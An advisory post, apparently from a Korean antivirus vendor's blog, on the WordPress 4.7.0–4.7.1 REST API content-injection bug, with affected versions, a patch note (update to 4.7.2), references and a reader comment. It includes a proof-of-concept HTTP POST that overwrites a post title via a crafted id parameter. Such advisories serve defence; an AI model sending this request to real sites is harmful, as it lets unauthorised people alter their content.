포스팅 내용

국내외 보안동향

심각한 워드프레스 REST API 버그 발견!

심각한 워드프레스 REST API 버그 발견!


최근 워드프레스에서 심각한 REST API 버그가 발견되었습니다. 해당 버그는 워드프레스의 REST API에 존재하며, 이를 통하여 원격 권한 상승과 컨텐츠 인젝션 버그를 유발할 수 있습니다. 



영향받는 버전


워드프레스 4.7.0 - 4.7.1



취약점 내용


워드프레스 4.7.0버전 이후 REST API가 디폴트로 활성화 되도록 추가되었으며, 이 기능을 악용하면 승인되지 않은 해커가 방문자들을 악성 익스플로잇으로 이동시킬 수 있도록 허용합니다.



POC 


POST /index.php/wp-json/wp/v2/posts/500?id=500a HTTP/1.1


Host: xxx.net


User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36


Content-Type: application/json


Content-Length: 43

 


{"title":"xxxx"}



패치방법


워드프레스 4.7.2 로 업데이트






참고사이트 

https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html

http://v2.wp-api.org/


  1. SONYLOVE 2017.02.07 16:27 신고  수정/삭제  댓글쓰기

    워드프레스에 관심이 요즘 생겨 제목이 눈에 띄어 들어왔는데 알약 블로그가 있는걸 처음 알았어요.
    녹색이 알약이란 이미지랑 너무 잘 어울려요.

    • 알약(Alyac) 2017.02.07 16:53 신고  수정/삭제

      안녕하세요. ^^ 방문해주셔서 감사합니다. 알약 블로그는 사용자분께 유용한 보안 정보를 제공해드리기 위해 운영되고 있습니다. 자주 놀러와주세요~

티스토리 방명록 작성
name password homepage